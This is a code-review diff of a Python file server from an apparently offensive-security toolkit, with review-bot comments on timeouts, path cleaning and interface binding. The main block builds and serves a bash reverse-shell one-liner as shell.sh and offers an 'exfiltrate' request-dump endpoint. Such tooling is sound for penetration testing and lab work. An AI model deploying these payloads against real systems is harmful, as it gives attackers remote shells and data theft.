|
@@ -3,6 +3,7 @@
|
|
|
from hackingscripts import util
|
|
|
from http.server import BaseHTTPRequestHandler, HTTPServer
|
|
|
import threading
|
|
|
+import requests
|
|
|
import sys
|
|
|
import os
|
|
|
import ssl
|
|
@@ -15,13 +16,26 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
|
|
|
def do_POST(self):
|
|
|
self.do_GET()
|
|
|
|
|
|
+ def onForward(self, target):
|
|
|
+ queryStr = "" if "?" not in self.path else self.path[self.path.index("?")+1:]
|
|
|
+ if queryStr:
|
|
|
+ target += "?" if "?" not in target else "&"
|
|
|
+ target += queryStr
|
|
|
+
|
|
|
+ method = self.command
|
|
|
+ res = requests.request(method, target)
|
|
|
+ return res.content, res.status_code
|
|
|
+
|
|
|
def do_GET(self):
|
|
|
- path = self.path if "?" not in self.path else self.path[0:self.path.find("?")]
|
|
|
- if path in self.server.files:
|
|
|
- data = self.server.files[path]
|
|
|
- self.send_response(200)
|
|
|
+
|
|
|
+ path = self.server.cleanPath(self.path)
|
|
|
+ if path in self.server.routes:
|
|
|
+ data, code = self.server.routes[path](self)
|
|
|
+ self.send_response(code)
|
|
|
self.end_headers()
|
|
|
- self.wfile.write(data)
|
|
|
+
|
|
|
+ if data:
|
|
|
+ self.wfile.write(data)
|
|
|
else:
|
|
|
self.send_response(404)
|
|
|
self.end_headers()
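Review bot: onForward calls `requests.request(method, target)` with no timeout and no error handling. HttpFileServer derives from the plain HTTPServer, which serves one request at a time, so an upstream that never answers stalls every other route. A connection error is raised before do_GET has sent any status line, so the client gets no response at all. Only the method and the query string are forwarded; the request body and headers of a POST are dropped, which a docstring on onForward should state. A bounded timeout and a 502 on upstream failure would keep the handler responsive, as in the excerpt below (the 10 second value is an example).

```python
    def onForward(self, target):
        # … unchanged: query string appended to target …
        try:
            res = requests.request(self.command, target, timeout=10)
        except requests.RequestException:
            # upstream unreachable or timed out: report a gateway error
            return b"", 502
        return res.content, res.status_code
```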
|
|
@@ -42,34 +56,40 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
|
|
|
|
|
|
def log_message(self, format, *args):
|
|
|
if self.server.logRequests:
|
|
|
- # BaseHTTPRequestHandler.log_message(format, *args)
|
|
|
super().log_message(format, *args)
|
|
|
|
|
|
class HttpFileServer(HTTPServer):
|
|
|
def __init__(self, addr, port):
|
|
|
super().__init__((addr, port), FileServerRequestHandler)
|
|
|
self.logRequests = False
|
|
|
+ self.routes = { }
|
|
|
self.dumpRequests = []
|
|
|
- self.files = { }
|
|
|
|
|
|
- def addFile(self, name, data):
|
|
|
- if isinstance(data, str):
|
|
|
- data = data.encode("UTF-8")
|
|
|
- if not name.startswith("/"):
|
|
|
- name = "/" + name
|
|
|
- self.files[name.strip()] = data
|
|
|
+ def cleanPath(self, path):
|
|
|
+
|
|
|
+ if "?" in path:
|
|
|
+ path = path[0:path.find("?")]
|
|
|
+
|
|
|
+ if not path.startswith("/"):
|
|
|
+ path = "/" + path
|
|
|
+
|
|
|
+ return path.strip()
|
|
|
|
|
|
def addFile(self, name, data):
|
|
|
if isinstance(data, str):
|
|
|
data = data.encode("UTF-8")
|
|
|
- if not name.startswith("/"):
|
|
|
- name = "/" + name
|
|
|
- self.files[name.strip()] = data
|
|
|
+
|
|
|
+ # return 200 - OK and data
|
|
|
+ self.addRoute(name, lambda req: (data, 200))
|
|
|
|
|
|
def dumpRequest(self, name):
|
|
|
- if not name.startswith("/"):
|
|
|
- name = "/" + name
|
|
|
- self.dumpRequests.append(name)
|
|
|
+ self.dumpRequests.append(self.cleanPath(name))
|
|
|
+
|
|
|
+ def addRoute(self, path, func):
|
|
|
+ self.routes[self.cleanPath(path)] = func
|
|
|
+
|
|
|
+ def forwardRequest(self, path, target):
|
|
|
+ self.addRoute(path, lambda req: req.onForward(target))
|
|
|
|
|
|
def enableLogging(self):
|
|
|
self.logRequests = True
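Review bot: cleanPath tests `startswith("/")` before it strips whitespace, so a name registered with leading spaces (for example " shell.sh") is stored as "/ shell.sh" and can never match a request path. Stripping first, with `path = path.strip()` at the top of cleanPath, makes addFile, dumpRequest and addRoute agree. The helper compares the raw request target, so a percent-encoded or fragment-bearing form of a registered path falls through to 404. That is a safe default for an exact-match table, but it deserves a comment. addRoute would also benefit from a docstring giving the handler contract that do_GET relies on: the callable receives the request handler and returns a `(data, code)` pair, with `data` as bytes or a falsy value for an empty body.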
|
|
@@ -99,13 +119,27 @@ class HttpFileServer(HTTPServer):
|
|
|
t.start()
|
|
|
return t
|
|
|
|
|
|
-# EXAMPLE
|
|
|
+ def start(self):
|
|
|
+ return self.serve_forever()
|
|
|
+
|
|
|
if __name__ == "__main__":
|
|
|
- listenPort = 4444 if len(sys.argv) < 2 else int(sys.argv[1])
|
|
|
- ipAddress = util.getAddress()
|
|
|
+ if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy"]:
|
|
|
+ print("Usage: %s [shell,dump,proxy]" % sys.argv[0])
|
|
|
+ exit(1)
|
|
|
|
|
|
- rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
|
|
|
fileServer = HttpFileServer("0.0.0.0", 80)
|
|
|
- fileServer.addFile("shell.sh", rev_shell)
|
|
|
- fileServer.startBackground()
|
|
|
- print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
|
|
|
+ ipAddress = util.getAddress()
|
|
|
+
|
|
|
+ if sys.argv[1] == "shell":
|
|
|
+ listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])
|
|
|
+ rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
|
|
|
+ fileServer.addFile("shell.sh", rev_shell)
|
|
|
+ print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
|
|
|
+ elif sys.argv[1] == "dump":
|
|
|
+ fileServer.dumpRequest("/exfiltrate")
|
|
|
+ print("Exfiltrate data using: http://%s/exfiltrate" % ipAddress)
|
|
|
+ elif sys.argv[1] == "proxy":
|
|
|
+ fileServer.forwardRequest("/proxy", "https://google.com")
|
|
|
+ print("Exfiltrate data using: http://%s/proxy" % ipAddress)
|
|
|
+
|
|
|
+ fileServer.start()
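Review bot: The listener is created as `HttpFileServer("0.0.0.0", 80)` before the mode is checked, so in proxy mode any host that can reach port 80 on any interface can make this machine issue requests to the forward target, with no authentication in the visible code. If util.getAddress() returns the address of the intended interface (its body is not shown here, so this needs confirming), binding to it narrows that exposure: `fileServer = HttpFileServer(ipAddress, 80)` after `ipAddress` is assigned. The proxy branch also prints the dump-mode message; `print("Forwarding requests via: http://%s/proxy" % ipAddress)` would describe it correctly. `exit(1)` relies on the site-provided builtin, and `sys` is already imported, so `sys.exit(1)` is the safer call.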
|